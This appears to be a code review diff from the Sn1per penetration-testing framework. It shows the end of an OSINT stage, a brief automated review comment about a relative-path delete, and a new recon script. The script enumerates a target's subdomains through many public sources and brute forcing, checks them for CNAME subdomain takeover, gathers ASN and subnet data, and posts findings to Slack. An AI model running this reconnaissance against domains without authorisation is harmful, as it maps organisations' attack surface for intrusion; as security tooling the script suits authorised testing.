sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/osint/inurlbr-$TARGET > $LOOT_DIR/osint/inurlbr-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/osint/inurlbr-$TARGET
rm -Rf output/ cookie.txt exploits.conf
fi
GHDB="1"
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
fi
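Review bot: `rm -Rf output/ cookie.txt exploits.conf` after the inurlbr run is relative to whatever the current working directory happens to be; nothing in this file changes directory first, so it removes an unrelated `output/` tree if the scan is started from a directory that has one. Use an absolute path or `cd` into the plugin directory before running it, and while there replace the hardcoded `/usr/share/sniper/bin/inurlbr.php` with `$INSTALL_DIR/bin/inurlbr.php`, which the Slack call in this same file already uses for its path. `GHDB="1"` is assigned after the INURLBR block but never read anywhere in this file.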

263
modes/recon.sh Normal file

@@ -0,0 +1,263 @@
if [[ "$RECON" = "1" ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per recon scan: $TARGET [recon] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per recon scan: $TARGET [recon] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
touch $LOOT_DIR/domains/domains_old-$TARGET.txt 2> /dev/null
cp $LOOT_DIR/domains/domains-$TARGET-full.txt $LOOT_DIR/domains/domains_old-$TARGET.txt 2> /dev/null
if [[ "$SUBLIST3R" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 /usr/share/sniper/plugins/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null > /dev/null
sed -ie 's/<BR>/\n/g' domains-$TARGET-full.txt 2> /dev/null
mv -f $LOOT_DIR/domains/domains-$TARGET.txte $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
fi
if [[ "$AMASS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA AMASS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
amass enum -ip -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -rf /usr/share/sniper/plugins/massdns/lists/resolvers.txt -d $TARGET 2>/dev/null > /dev/null
cut -d" " -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt 2>/dev/null | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
cut -d" " -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt 2>/dev/null > $LOOT_DIR/ips/amass-ips-$TARGET.txt
wc -l $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
wc -l $LOOT_DIR/ips/amass-ips-$TARGET.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING REVERSE WHOIS DNS SUBDOMAINS VIA AMASS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
amass intel -whois -d $TARGET > $LOOT_DIR/domains/domains-$TARGET-reverse-whois.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-reverse-whois.txt 2> /dev/null
fi
if [[ "$SUBFINDER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER $RESET"
echo -e "$OKBLUE[*]$RESET Running: subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -d $TARGET -t 100 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -d $TARGET -nW -rL /sniper/wordlists/resolvers.txt -t $THREADS 2>/dev/null > /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-subfinder.txt 2> /dev/null
fi
if [[ "$DNSCAN" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_QUICK -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt 2>/dev/null | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
sed -ie 's/<BR>/\n/g' $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
mv -f $LOOT_DIR/domains/domains-$TARGET.txte $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
fi
echo ""
if [[ "$CRTSH" = "1" ]]; then
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$RESET"
curl -s https://crt.sh/?q=%25.$TARGET > $LOOT_DIR/domains/domains-$TARGET-presorted.txt
cat $LOOT_DIR/domains/domains-$TARGET-presorted.txt | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/BR/\n/g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt
wc -l $LOOT_DIR/domains/domains-$TARGET-crt.txt 2> /dev/null
echo ""
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-crt.txt"
fi
if [[ "$SPYSE" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SPYSE SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKBLUE"
spyse -target $TARGET --subdomains | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-spyse.txt
wc -l $LOOT_DIR/domains/domains-$TARGET-spyse.txt 2> /dev/null
fi
if [[ "$CENSYS_SUBDOMAINS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING CENSYS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/censys-subdomain-finder/censys_subdomain_finder.py --censys-api-id $CENSYS_APP_ID --censys-api-secret $CENSYS_API_SECRET $TARGET | egrep "\-" | awk '{print $2}' | egrep -v "Searching|Found" > $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null
fi
if [[ "$SHODAN" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SHODAN SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
shodan init $SHODAN_API_KEY
shodan search "hostname:*.$TARGET" > $LOOT_DIR/domains/shodan-$TARGET.txt 2> /dev/null
awk '{print $3}' $LOOT_DIR/domains/shodan-$TARGET.txt 2> /dev/null | grep -v "\;" > $LOOT_DIR/domains/domains-$TARGET-shodan-sorted.txt 2> /dev/null
awk '{print $1}' $LOOT_DIR/domains/shodan-$TARGET.txt 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2>/dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-shodan-sorted.txt 2> /dev/null
wc -l $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
fi
if [[ "$PROJECT_SONAR" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING PROJECT SONAR SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -fsSL "https://dns.bufferover.run/dns?q=.$TARGET" | sed 's/\"//g' | cut -f2 -d "," | grep -v "<BR>" | sort -u | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null
fi
if [[ "$GITHUB_SUBDOMAINS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING GITHUB SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 /usr/share/sniper/bin/github-subdomains.py -t $GITHUB_API_TOKEN -d $TARGET $LOOT_DIR/domains/domains-$TARGET-github.txt 2> /dev/null
fi
if [[ "$RAPIDDNS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING RAPIDDNS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s "https://rapiddns.io/subdomain/$TARGET?full=1&down=1#exportData()" | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | grep "$TARGET" | cut -d\/ -f3 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-rapiddns.txt 2> /dev/null
fi
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-spyse.txt /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-shodan-sorted.txt 2>/dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-github.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-rapiddns.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
cat $LOOT_DIR/domains/targets.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
sed -i '/^$/d' $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
sed -i '/^$/d' $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null | grep -v "*" | grep -v "?" 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-presorted-nowildcards.txt
wc -l $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
if [[ "$SUBBRUTE_DNS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SUBBRUTE SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 "$INSTALL_DIR/plugins/massdns/scripts/subbrute.py" $INSTALL_DIR/wordlists/domains-all.txt $TARGET 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-subbrute.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-subbrute.txt 2> /dev/null
fi
if [[ "$ALT_DNS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING ALTDNS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "$TARGET" > /tmp/domain 2> /dev/null
altdns -i /tmp/domain -w $INSTALL_DIR/wordlists/altdns.txt -o $LOOT_DIR/domains/domains-$TARGET-altdns.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-altdns.txt 2> /dev/null
fi
if [[ "$DNSGEN" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNSGEN SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
dnsgen /tmp/domain > $LOOT_DIR/domains/domains-$TARGET-dnsgen.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-dnsgen.txt 2> /dev/null
fi
if [[ "$MASS_DNS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING MASSDNS ON SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
sort -u $LOOT_DIR/domains/domains-$TARGET-presorted-nowildcards.txt $LOOT_DIR/domains/domains-$TARGET-dnsgen.txt $LOOT_DIR/domains/domains-$TARGET-altdns.txt $LOOT_DIR/domains/domains-$TARGET-subbrute.txt 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-alldns.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-alldns.txt 2> /dev/null
massdns -r /usr/share/sniper/plugins/massdns/lists/resolvers.txt $LOOT_DIR/domains/domains-$TARGET-alldns.txt -o S -t A -w $LOOT_DIR/domains/domains-$TARGET-massdns.txt > /dev/null
awk -F ". " '{print $1}' $LOOT_DIR/domains/domains-$TARGET-massdns.txt 2> /dev/null | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
#grep "CNAME" $LOOT_DIR/domains/domains-$TARGET-massdns.txt | awk '{print $3}' | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-massdns-CNAME.txt
#wc -l $LOOT_DIR/domains/domains-$TARGET-massdns-CNAME.txt
#grep "A " $LOOT_DIR/domains/domains-$TARGET-massdns.txt | awk '{print $3}' | grep -v "*" | sort -u > $LOOT_DIR/ips/massdns-A-records-$TARGET.txt
#wc -l $LOOT_DIR/ips/massdns-A-records-$TARGET.txt
#cat $LOOT_DIR/ips/massdns-A-records-$TARGET.txt >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
#wc -l $LOOT_DIR/ips/ips-all-unsorted.txt
fi
cat $LOOT_DIR/domains/domains-$TARGET-presorted.txt $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null | sort -u 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-full.txt
sed -ie 's/<BR>/\n/g' $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null
mv -f $LOOT_DIR/domains/domains-$TARGET-full.txte $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null
wc -l $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-full.txt >> $LOOT_DIR/scans/updated.txt 2> /dev/null
#rm -f $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
diff $LOOT_DIR/domains/domains_old-$TARGET.txt $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/domains/domains_new-$TARGET.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED NEW SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wc -l $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null
cat $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null
if [[ $(wc -c $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• New domains detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/domains/domains_new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_DOMAINS_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• New domains detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/domains/domains_new-$TARGET.txt"
fi
fi
echo -e "$RESET"
if [[ "$STATIC_GREP_SEARCH" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING INTERESTING DOMAINS SEARCH $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
egrep -iE "GREP_INTERESTING_SUBDOMAINS" $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null | tee $LOOT_DIR/domains/domains_interesting-$TARGET.txt | head -n "$GREP_MAX_LINES"
fi
if [[ "$SUBHIJACK_CHECK" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR CNAME SUBDOMAIN HIJACKING $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep -h "CNAME" $LOOT_DIR/nmap/takeovers-* 2>/dev/null | sort -u 2> /dev/null > $LOOT_DIR/nmap/takeovers_old-all.txt
dig $TARGET CNAME | egrep -i "netlify|anima|bitly|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "netlify|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
grep -h "CNAME" $LOOT_DIR/nmap/takeovers-* 2>/dev/null | sort -u 2> /dev/null | awk '{print $1 " " $4 " " $5}' | grep CNAME | sort -u > $LOOT_DIR/nmap/takeovers_new-all.txt
diff $LOOT_DIR/nmap/takeovers_old-all.txt $LOOT_DIR/nmap/takeovers_new-all.txt 2> /dev/null | grep "> " | awk '{print $2 " " $3 " " $4}' | sort -u > $LOOT_DIR/nmap/takeovers_new-diff.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_TAKEOVERS_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/takeovers_new-diff.txt"
fi
fi
if [[ "$SUBOVER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED STARTING SUBOVER HIJACKING SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cp $LOOT_DIR/nmap/subover-$TARGET.txt $LOOT_DIR/nmap/subover_old-$TARGET.txt 2> /dev/null
cd ~/go/src/github.com/Ice3man543/SubOver
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/subover-$TARGET > $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/subover-$TARGET 2> /dev/null
diff $LOOT_DIR/nmap/subover_old-$TARGET.txt $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subover_new-$TARGET.txt
if [[ "$SLACK_NOTIFICATIONS_SUBOVER_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/subover_new-$TARGET.txt"
fi
cd $INSTALL_DIR
fi
if [[ "$SUBJACK" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED STARTING SUBJACK HIJACKING SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cp $LOOT_DIR/nmap/subjack-$TARGET.txt $LOOT_DIR/nmap/subjack_old-$TARGET.txt 2> /dev/null
~/go/bin/subjack -w $LOOT_DIR/domains/domains-$TARGET-full.txt -c ~/go/src/github.com/haccer/subjack/fingerprints.json -t $THREADS -timeout 30 -o $LOOT_DIR/nmap/subjack-$TARGET.txt -a -v | egrep -v "Not Vulnerable"
diff $LOOT_DIR/nmap/subjack_old-$TARGET.txt $LOOT_DIR/nmap/subjack-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subjack_new-$TARGET.txt
if [[ "$SLACK_NOTIFICATIONS_SUBJACK_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/subjack_new-$TARGET.txt"
fi
fi
if [[ "$ASN_CHECK" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RETRIEVING ASN INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd $LOOT_DIR/ips/ 2>/dev/null
asnip -t $TARGET | tee $LOOT_DIR/ips/asn-$TARGET.txt 2>/dev/null
mv $LOOT_DIR/ips/cidrs.txt $LOOT_DIR/ips/cidrs-$TARGET.txt 2>/dev/null
mv $LOOT_DIR/ips/ips.txt $LOOT_DIR/ips/ips-$TARGET.txt 2> /dev/null
cd $INSTALL_DIR 2>/dev/null
fi
if [[ "$SUBNET_RETRIEVAL" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED STARTING SUBNET RETRIEVAL $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s -L --data "ip=$TARGET" https://2ip.me/en/services/information-service/provider-ip\?a\=act | grep -o -E '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/[0-9]{1,2}' | tee $LOOT_DIR/ips/subnets-$TARGET.txt
if [[ "$SLACK_NOTIFICATIONS_SUBNETS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/ips/subnets-$TARGET.txt"
fi
fi
if [[ "$SCAN_ALL_DISCOVERED_DOMAINS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED STARTING FLYOVER SCAN OF ALL DOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
sniper -f $LOOT_DIR/domains/domains-$TARGET-full.txt -m flyover -w $WORKSPACE
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [recon] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [recon] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
fi
